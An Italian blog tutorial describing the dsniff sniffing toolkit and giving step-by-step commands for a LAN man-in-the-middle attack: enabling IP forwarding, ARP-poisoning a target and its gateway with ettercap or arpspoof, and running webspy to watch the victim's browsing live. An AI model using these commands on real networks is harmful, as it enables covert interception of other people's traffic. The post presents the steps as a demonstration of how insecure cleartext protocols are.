VoIP and Hacking

La dsniff family

by admin on Jan.17, 2010, under Hacking, Linux, Sicurezza, Tools

Il package dsniff è un interessante, per quanto datato, insieme di tools finalizzati allo sniffing, inclusi l’omonimo dsniff (un password sniffer), arpspoof (un tool di ARP poisoning), dnsspoof (un tool per il DNS spoofing), msgsnarf (tool che cattura e visualizza i messaggi tra clients IM), mailsnarf (tool che cattura e visualizza i messaggi email), tcpkill (tool che termina le connessioni tcp nella LAN locale), tcpnice (tool che forza altre connessioni a ridurre il consumo di banda delle proprie connessioni tcp) ed infine webspy (tool che cattura e visualizza in real time la navigazione web del target).
Quest’ultimo è sicuramente il più immediato e spettacolare, e risulta quindi molto adatto a dimostrare facilmente quanto siano poco sicure le comunicazioni in una rete locale se ci si ostina, come fanno purtroppo molti amministratori di reti aziendali o istituzionali, a utilizzare protocolli in chiaro o facilmente bucabili:

Per poter catturare il traffico web della vittima, se questa risulta cablata su uno switch, occorre che esso passi interamente attraverso l’interfaccia della macchina attaccante, prima di essere inoltrata, perciò è necessario che quest’ultima abbia attiva la funzionalità di port forwarding, pena l’impossibilità della vittima a comunicare con l’ esterno

# echo 1 > /proc/sys/net/ipv4/ip_forward

Il primo passo da effettuare consiste nell’avvelenamento della tabella arp sia del target che del gateway della locale subnet.
Abbiamo già visto come qualcosa del genere si possa ottenere facilmente con ettercap.
Assumendo che l’indirizzo IP del target sia 192.168.1.90 e quello del gateway 192.168.1.1 si potrebbe impartire ad esempio:

# ettercap -i eth0 -Tq -M arp:remote /192.168.1.1/ /192.168.1.90/

La stessa cosa può essere attuata tramite arpspoof:

# arpspoof -i eth0 -t 192.168.1.1 192.168.1.90 1>/dev/null &
# arpspoof -i eth0 -t 192.168.1.90 192.168.1.1 2>/dev/null &

Ora è il momento di mandare in esecuzione webspy:

# webspy -i eth0 192.168.1.90

Ed infine avviare il browser da linea di comando.

# mozilla &

Dopo che il broswer sarà stato avviato ogni sito visitato dalla vittimà vi verrà visualizzato in real time.

Send post as PDF to PDF | PDF Creator | PDF Converter
:, , ,

Comments are closed.

Cerchi qualcosa in particolare?

Usa il form qui sotto per cercare nel sito:

Blogroll!

Alcuni links...

Archives

Tutte le entries, in ordine cronologio...